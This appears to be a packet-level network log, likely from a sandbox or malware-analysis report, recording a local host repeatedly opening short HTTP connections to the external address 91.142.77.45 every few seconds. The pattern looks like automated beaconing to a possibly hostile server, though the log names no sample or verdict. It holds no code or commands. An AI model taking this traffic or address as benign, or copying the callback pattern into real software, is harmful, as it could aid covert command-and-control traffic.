Nov 3, 2022 12:30:12.039987087 CET	80	49707	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:12.040091991 CET	49707	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:12.102111101 CET	80	49707	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:13.686108112 CET	80	49707	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:13.686407089 CET	49707	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:13.689996004 CET	49707	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:13.752177954 CET	80	49707	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:13.960999012 CET	49708	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:14.024719000 CET	80	49708	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:14.024915934 CET	49708	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:14.035063982 CET	49708	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:14.097285032 CET	80	49708	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:14.097431898 CET	49708	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:14.159482002 CET	80	49708	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:15.684953928 CET	80	49708	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:15.685059071 CET	49708	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:15.685152054 CET	49708	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:15.747353077 CET	80	49708	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:16.009772062 CET	49709	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:16.071901083 CET	80	49709	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:16.072161913 CET	49709	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:16.075566053 CET	49709	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:16.137646914 CET	80	49709	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:16.137861967 CET	49709	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:16.199959040 CET	80	49709	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:17.656419039 CET	80	49709	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:17.656625032 CET	49709	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:17.656876087 CET	49709	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:17.718825102 CET	80	49709	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:18.232103109 CET	49710	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:18.294275999 CET	80	49710	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:18.294435978 CET	49710	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:18.297576904 CET	49710	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:18.359631062 CET	80	49710	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:18.359889030 CET	49710	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:18.666949987 CET	49710	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:18.729307890 CET	80	49710	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:19.791138887 CET	80	49710	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:19.791312933 CET	49710	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:19.791399956 CET	49710	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:19.853351116 CET	80	49710	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:20.195004940 CET	49711	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:20.257170916 CET	80	49711	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:20.260675907 CET	49711	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:20.264286041 CET	49711	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:20.326256037 CET	80	49711	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:20.327415943 CET	49711	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:20.389652014 CET	80	49711	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:21.541560888 CET	80	49711	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:21.541733980 CET	49711	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:21.541781902 CET	49711	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:21.854696989 CET	49711	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:22.066165924 CET	49712	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:22.128371954 CET	80	49712	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:22.128586054 CET	49712	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:22.162497044 CET	49712	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:22.224786043 CET	80	49712	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:22.224951029 CET	49712	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:22.287046909 CET	80	49712	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:22.464206934 CET	49711	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:22.527188063 CET	80	49711	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:23.556931019 CET	80	49712	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:23.557039022 CET	49712	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:23.557166100 CET	49712	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:23.619096041 CET	80	49712	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:25.335967064 CET	49713	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:25.401177883 CET	80	49713	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:25.401310921 CET	49713	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:25.414439917 CET	49713	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:25.476397991 CET	80	49713	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:25.476478100 CET	49713	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:25.538403988 CET	80	49713	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:26.998667002 CET	80	49713	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:27.002180099 CET	49713	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:27.002180099 CET	49713	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:27.064440012 CET	80	49713	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:27.367080927 CET	49714	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:27.428744078 CET	80	49714	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:27.428901911 CET	49714	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:27.432236910 CET	49714	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:27.493885994 CET	80	49714	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:27.493982077 CET	49714	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:27.886517048 CET	49714	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:28.386557102 CET	49714	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:28.448426008 CET	80	49714	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:29.899760008 CET	80	49714	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:29.899986029 CET	49714	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:29.900067091 CET	49714	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:29.962599993 CET	80	49714	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:31.066435099 CET	49715	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:31.128760099 CET	80	49715	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:31.128972054 CET	49715	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:31.132672071 CET	49715	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:31.194847107 CET	80	49715	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:31.195020914 CET	49715	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:31.257276058 CET	80	49715	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:32.611166954 CET	80	49715	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:32.611309052 CET	49715	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:32.611351013 CET	49715	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:32.673342943 CET	80	49715	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:32.927229881 CET	49716	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:32.989010096 CET	80	49716	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:32.989780903 CET	49716	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:32.992650986 CET	49716	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:33.054290056 CET	80	49716	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:33.057817936 CET	49716	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:33.119534016 CET	80	49716	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:34.572782040 CET	80	49716	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:34.573118925 CET	49716	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:34.573695898 CET	49716	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:34.635202885 CET	80	49716	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:34.955142975 CET	49717	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:35.017050982 CET	80	49717	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:35.017249107 CET	49717	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:35.019959927 CET	49717	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:35.081729889 CET	80	49717	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:35.081929922 CET	49717	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:35.143773079 CET	80	49717	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:36.516442060 CET	80	49717	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:36.516741991 CET	49717	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:36.517160892 CET	49717	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:36.578659058 CET	80	49717	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:36.937236071 CET	49718	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:36.999310970 CET	80	49718	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:36.999479055 CET	49718	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:37.003048897 CET	49718	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:37.065037966 CET	80	49718	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:37.065248966 CET	49718	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:37.371615887 CET	49718	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:37.684214115 CET	49718	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:38.293596983 CET	49718	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:39.512592077 CET	49718	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:39.574800014 CET	80	49718	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:41.067852974 CET	80	49718	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:41.067995071 CET	49718	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:41.068048954 CET	49718	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:41.130291939 CET	80	49718	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:42.367435932 CET	49719	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:42.429584980 CET	80	49719	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:42.429780006 CET	49719	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:42.564459085 CET	49719	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:42.856527090 CET	49719	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:42.918482065 CET	80	49719	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:43.169044971 CET	49719	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:43.841007948 CET	49719	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:43.904088020 CET	80	49719	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:45.376826048 CET	80	49719	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:45.376966953 CET	49719	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:45.377012968 CET	49719	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:45.439172029 CET	80	49719	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:45.726284027 CET	49720	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:45.787942886 CET	80	49720	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:45.788233995 CET	49720	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:45.793164968 CET	49720	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:45.854969978 CET	80	49720	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:45.855376005 CET	49720	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:46.207489014 CET	49720	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:46.269138098 CET	80	49720	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:47.547245026 CET	80	49720	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:47.547395945 CET	49720	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:47.547475100 CET	49720	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:47.609019041 CET	80	49720	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:47.966005087 CET	49721	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:48.028449059 CET	80	49721	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:48.028647900 CET	49721	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:48.032802105 CET	49721	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:48.325807095 CET	49721	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:48.638204098 CET	49721	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:48.742851019 CET	80	49721	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:50.362963915 CET	80	49721	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:50.363198996 CET	49721	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:50.363251925 CET	49721	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:50.756397963 CET	49722	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:50.818571091 CET	80	49722	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:50.818783998 CET	49722	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:50.822443962 CET	49722	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:51.122917891 CET	49722	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:51.185391903 CET	80	49722	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:51.438905001 CET	49722	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:51.501465082 CET	80	49722	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:51.560430050 CET	49721	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:51.623074055 CET	80	49721	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:53.023996115 CET	80	49722	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:53.025599003 CET	49722	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:53.025649071 CET	49722	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:53.087821007 CET	80	49722	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:53.295505047 CET	49723	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:53.357762098 CET	80	49723	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:53.361790895 CET	49723	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:53.367985010 CET	49723	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:53.430071115 CET	80	49723	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:53.430174112 CET	49723	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:53.492078066 CET	80	49723	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:54.557574987 CET	80	49723	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:54.557756901 CET	49723	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:54.557861090 CET	49723	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:54.619935989 CET	80	49723	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:54.840115070 CET	49724	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:54.902261019 CET	80	49724	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:54.902530909 CET	49724	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:54.913990974 CET	49724	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:55.216989040 CET	49724	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:55.279050112 CET	80	49724	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:55.529526949 CET	49724	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:56.139131069 CET	49724	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:56.201148033 CET	80	49724	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:57.636605024 CET	80	49724	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:57.636871099 CET	49724	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:57.636979103 CET	49724	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:57.698868990 CET	80	49724	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:57.852768898 CET	49725	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:57.915365934 CET	80	49725	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:57.915684938 CET	49725	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:57.918358088 CET	49725	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:57.981117010 CET	80	49725	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:57.981422901 CET	49725	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:58.044042110 CET	80	49725	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:59.345747948 CET	80	49725	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:59.345859051 CET	49725	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:59.345896959 CET	49725	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:59.408343077 CET	80	49725	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:59.590900898 CET	49726	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:59.653625965 CET	80	49726	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:59.653966904 CET	49726	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:59.657450914 CET	49726	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:59.719468117 CET	80	49726	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:59.719604969 CET	49726	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:59.781557083 CET	80	49726	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:00.653287888 CET	80	49726	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:00.655242920 CET	49726	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:00.663146973 CET	49726	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:00.725272894 CET	80	49726	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:01.617027998 CET	49727	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:01.679668903 CET	80	49727	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:01.679909945 CET	49727	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:01.987085104 CET	49727	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:02.049709082 CET	80	49727	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:02.049869061 CET	49727	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:02.112337112 CET	80	49727	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:03.547635078 CET	80	49727	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:03.547801971 CET	49727	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:03.566931009 CET	49727	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:03.629586935 CET	80	49727	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:03.837477922 CET	49728	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:03.899904013 CET	80	49728	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:03.900019884 CET	49728	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:03.903902054 CET	49728	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:03.965291977 CET	80	49728	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:03.965487003 CET	49728	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:04.027069092 CET	80	49728	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:05.359035969 CET	80	49728	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:05.359316111 CET	49728	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:05.359364033 CET	49728	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:05.421298981 CET	80	49728	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:05.638746977 CET	49729	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:05.700804949 CET	80	49729	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:05.703757048 CET	49729	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:05.707381964 CET	49729	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:05.769627094 CET	80	49729	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:05.770745993 CET	49729	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:05.832711935 CET	80	49729	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:07.339015961 CET	80	49729	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:07.339118958 CET	49729	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:07.339199066 CET	49729	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:07.401132107 CET	80	49729	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:07.560633898 CET	49730	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:07.623106956 CET	80	49730	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:07.624897957 CET	49730	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:07.626822948 CET	49730	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:07.689232111 CET	80	49730	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:07.689786911 CET	49730	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:07.752242088 CET	80	49730	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:09.196542025 CET	80	49730	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:09.196836948 CET	49730	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:09.196836948 CET	49730	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:09.259278059 CET	80	49730	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:09.445768118 CET	49731	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:09.508224964 CET	80	49731	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:09.508380890 CET	49731	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:09.511790991 CET	49731	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:09.574053049 CET	80	49731	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:09.574201107 CET	49731	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:09.636506081 CET	80	49731	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:10.691873074 CET	80	49731	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:10.692004919 CET	49731	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:10.692087889 CET	49731	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:10.754542112 CET	80	49731	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:11.184847116 CET	49732	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:14.187417030 CET	49732	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:20.203531981 CET	49732	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:20.265314102 CET	80	49732	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:20.265594006 CET	49732	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:20.467945099 CET	49732	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:20.530160904 CET	80	49732	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:20.530344963 CET	49732	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:20.592166901 CET	80	49732	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:21.820409060 CET	80	49732	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:21.820630074 CET	49732	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:22.154421091 CET	49732	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:22.216218948 CET	80	49732	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:22.549698114 CET	49733	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:22.612020016 CET	80	49733	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:22.612163067 CET	49733	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:22.614964008 CET	49733	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:22.906861067 CET	49733	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:22.969685078 CET	80	49733	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:23.219305992 CET	49733	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:23.281701088 CET	80	49733	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:25.021801949 CET	80	49733	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:25.022070885 CET	49733	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:25.022186041 CET	49733	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:25.084297895 CET	80	49733	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:25.312217951 CET	49734	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:25.374319077 CET	80	49734	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:25.374602079 CET	49734	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:25.377975941 CET	49734	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:25.439949989 CET	80	49734	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:25.440109015 CET	49734	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:25.735219002 CET	49734	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:25.797334909 CET	80	49734	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:27.178864956 CET	80	49734	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:27.179050922 CET	49734	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:27.179198027 CET	49734	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:27.240988016 CET	80	49734	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:27.448790073 CET	49735	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:27.512012959 CET	80	49735	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:27.512259960 CET	49735	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:27.516452074 CET	49735	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:27.578449965 CET	80	49735	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:27.582582951 CET	49735	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:27.644630909 CET	80	49735	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:28.883670092 CET	80	49735	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:28.883851051 CET	49735	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:28.884407997 CET	49735	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:28.946696043 CET	80	49735	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:29.147102118 CET	49736	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:29.209523916 CET	80	49736	91.142.77.45	192.168.2.6
Nov 3, 2022 12:31:29.209696054 CET	49736	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:29.221112013 CET	49736	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:31:29.283684969 CET	80	49736	91.142.77.45	192.168.2.6
